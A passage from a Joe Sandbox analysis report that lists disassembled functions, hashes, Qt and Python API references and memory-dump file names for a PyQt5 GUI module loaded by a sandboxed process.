Opcode ID: 87c7589c3d866cc5d2d0eb5da0fb8451543ff253408e77ed3a235263022f7c2c
Instruction ID: 429cc2b1afa43d76b9c4f684db1a3d8aeab51e767667288cbfd997a2d691c0f9
Opcode Fuzzy Hash: 87c7589c3d866cc5d2d0eb5da0fb8451543ff253408e77ed3a235263022f7c2c
Instruction Fuzzy Hash: 2E01E1A1B0D64182EFA08B35F9511357358EB45BE0F440274DA2F53BD0DEBCE0428700

Function 00007FFB9A2E9B30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

?remove@?$QVector@VQPoint@@@@QEAAXH@Z.QT5CORE ref: 00007FFB9A2E9BB6
?remove@?$QVector@VQPoint@@@@QEAAXH@Z.QT5CORE ref: 00007FFB9A2E9C55

Strings

__delitem__, xrefs: 00007FFB9A2E9C90
QPolygon, xrefs: 00007FFB9A2E9C9C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?remove@?$Point@@@@Vector@
String ID: QPolygon$__delitem__
API String ID: 587356521-665072597
Opcode ID: 2a994bc7ece17de9686e903335fe4b35282a154f4388184507d86c54d20766b6
Instruction ID: 74b3f97e82355859c38bd53e235823900e8c0543db26a3c96c44bcf1b1d4d20b
Opcode Fuzzy Hash: 2a994bc7ece17de9686e903335fe4b35282a154f4388184507d86c54d20766b6
Instruction Fuzzy Hash: 4941EB76B0CB8682EB509F29E44416AB7A5FB89B94F548172EF4D53B68DF3CD085CB00

Function 00007FFB9A35BAA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

??MQStandardItem@@UEBA_NAEBV0@@Z.QT5GUI ref: 00007FFB9A35BB23
PyBool_FromLong.PYTHON3 ref: 00007FFB9A35BB2F

Strings

1J9, xrefs: 00007FFB9A35BAF2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromItem@@LongStandardV0@@
String ID: 1J9
API String ID: 709210250-2407233842
Opcode ID: c3cf89d32234f65ad9cb8b1ac91d7a74de0947322eaa4eac3e4b6056b424d204
Instruction ID: b73c792b2b39ffc1308ec9bbabf328b092def2b7c53a448e2891c8906d7edc0c
Opcode Fuzzy Hash: c3cf89d32234f65ad9cb8b1ac91d7a74de0947322eaa4eac3e4b6056b424d204
Instruction Fuzzy Hash: 3C211675A08A9282EA608F65F44426AB368FB9ABD8F1440B6DE8D13B68DF7CD1458700

Function 00007FFB9A333EA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

??8QPalette@@QEBA_NAEBV0@@Z.QT5GUI ref: 00007FFB9A333F23
PyBool_FromLong.PYTHON3 ref: 00007FFB9A333F2F

Strings

1J9, xrefs: 00007FFB9A333EF2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromLongPalette@@V0@@
String ID: 1J9
API String ID: 2256276294-2407233842
Opcode ID: 91527a5669e0e785ec8e892bf14fdca3b2671f552bc7a3f8aa753c9c092ce01b
Instruction ID: 740b156368d7bfefa6c530ab43a00b93561aff4683c2611d9f5f054a41f5ffc8
Opcode Fuzzy Hash: 91527a5669e0e785ec8e892bf14fdca3b2671f552bc7a3f8aa753c9c092ce01b
Instruction Fuzzy Hash: 11215E75A0CB5282EB608B25F40416AB378FB85B98F5484B6DE8D13B68CF7CD185C700

Function 00007FFB9A2F1B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

?isCopyOf@QTextCursor@@QEBA_NAEBV1@@Z.QT5GUI ref: 00007FFB9A2F1BF3
PyBool_FromLong.PYTHON3 ref: 00007FFB9A2F1BFF

Strings

1J9, xrefs: 00007FFB9A2F1BC2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_CopyCursor@@FromLongTextV1@@
String ID: 1J9
API String ID: 1629049401-2407233842
Opcode ID: d24751f4805590d8858050c391a3e6c61e34f4a8c69c97d6852fb7fad733c72e
Instruction ID: bb1f17d16289f69ed71635655c0e6e4a04d8a8d4961e2f4c07879819104ebb0b
Opcode Fuzzy Hash: d24751f4805590d8858050c391a3e6c61e34f4a8c69c97d6852fb7fad733c72e
Instruction Fuzzy Hash: 10215EB5A08B9281EB619B65F40426AB378FB89BD8F5440B2DF8D13B68CF3CD0858700

Function 00007FFB9A2D99A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

??8@YA_NAEBVQPageLayout@@0@Z.QT5GUI ref: 00007FFB9A2D9A23
PyBool_FromLong.PYTHON3 ref: 00007FFB9A2D9A2F

Strings

1J9, xrefs: 00007FFB9A2D99F2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ??8@Bool_FromLayout@@0@LongPage
String ID: 1J9
API String ID: 3886444301-2407233842
Opcode ID: 99ba104142243b47424562172ba40db84b83dfaa01b5d23d47fe70452c8eac9e
Instruction ID: ecd34fdb738963609ce15f1d1c51c7c52f642ae77b3ecce1d372305d461c6858
Opcode Fuzzy Hash: 99ba104142243b47424562172ba40db84b83dfaa01b5d23d47fe70452c8eac9e
Instruction Fuzzy Hash: 02215E76A0CB52C1EB608B65F44416AB368FB85B98F144172EE8D13B68CF7CD045C700

Function 00007FFB9A317B50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

??9Tab@QTextOption@@QEBA_NAEBU01@@Z.QT5GUI ref: 00007FFB9A317BD3
PyBool_FromLong.PYTHON3 ref: 00007FFB9A317BDC

Strings

1J9, xrefs: 00007FFB9A317BA2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromLongOption@@Tab@TextU01@@
String ID: 1J9
API String ID: 4107022758-2407233842
Opcode ID: 3e8f1b1ef7a1ababe6240be13039e9ccd9b33afcc53d986435980aecf71ee6cb
Instruction ID: 2c61fae96caec409be8e441cefcebd2c041f67ab17696ba32c8061f7a1a250a8
Opcode Fuzzy Hash: 3e8f1b1ef7a1ababe6240be13039e9ccd9b33afcc53d986435980aecf71ee6cb
Instruction Fuzzy Hash: 53213E75A0CB9282FB608B65F44416AB768FB85B98F1881B6DE8D13B68CF7CD045C700

Function 00007FFB9A33FBB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

??8QStaticText@@QEBA_NAEBV0@@Z.QT5GUI ref: 00007FFB9A33FC33
PyBool_FromLong.PYTHON3 ref: 00007FFB9A33FC3C

Strings

1J9, xrefs: 00007FFB9A33FC02

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromLongStaticText@@V0@@
String ID: 1J9
API String ID: 971950914-2407233842
Opcode ID: 20822373199da14a0f044434f5bbdfc83cb3b6a7d782b92dfe04628f8b3bdf32
Instruction ID: 06756bf2c076274d51aaeb1454740831db10137224dd3d4bf78fbbe5707b2b8a
Opcode Fuzzy Hash: 20822373199da14a0f044434f5bbdfc83cb3b6a7d782b92dfe04628f8b3bdf32
Instruction Fuzzy Hash: AC2130B5B0CB9282EB608B25F444169B378FB89B98F548176DE8D17B68DF7CD085C700

Function 00007FFB9A309BC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

??8QTextCursor@@QEBA_NAEBV0@@Z.QT5GUI ref: 00007FFB9A309C43
PyBool_FromLong.PYTHON3 ref: 00007FFB9A309C4C

Strings

1J9, xrefs: 00007FFB9A309C12

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_Cursor@@FromLongTextV0@@
String ID: 1J9
API String ID: 4057910976-2407233842
Opcode ID: 64ae8abc0300b33c2bb7bc5de28ff0d4751d9652e4d1edee7ea62c1611eee4f9
Instruction ID: 6e6abc1830f576d796e97d7a06cae5af2a6140cd8a8305c2ec452b99fc5cf8f6
Opcode Fuzzy Hash: 64ae8abc0300b33c2bb7bc5de28ff0d4751d9652e4d1edee7ea62c1611eee4f9
Instruction Fuzzy Hash: BD213E75A0CB5281EA608B65F44416AB368FB85BD8F544176DE9D23B68CF7CD145C700

Function 00007FFB9A32F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

??9@YA_NAEBVQSurfaceFormat@@0@Z.QT5GUI ref: 00007FFB9A32F923
PyBool_FromLong.PYTHON3 ref: 00007FFB9A32F92C

Strings

1J9, xrefs: 00007FFB9A32F8F2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ??9@Bool_Format@@0@FromLongSurface
String ID: 1J9
API String ID: 3577420104-2407233842
Opcode ID: 839d67b672de7dfd515a203c9a07a5346c47a5f9312b9ba1b7943f379964ccc2
Instruction ID: 0cc6bb7cc9980a1ef3904f36397808d80dd0856000d1f2d8c4f5b63507636159
Opcode Fuzzy Hash: 839d67b672de7dfd515a203c9a07a5346c47a5f9312b9ba1b7943f379964ccc2
Instruction Fuzzy Hash: 59213975A0CB9281EB608B66F45426AB378FB89BD8F1440B6DE8D13B68CF7CD055C700

Function 00007FFB9A2FB9D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

?surfaceType@QOffscreenSurface@@UEBA?AW4SurfaceType@QSurface@@XZ.QT5GUI ref: 00007FFB9A2FBA54

Strings

QWindow, xrefs: 00007FFB9A2FBA98
surfaceType(self) -> QSurface.SurfaceType, xrefs: 00007FFB9A2FBA85
surfaceType, xrefs: 00007FFB9A2FBA91

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
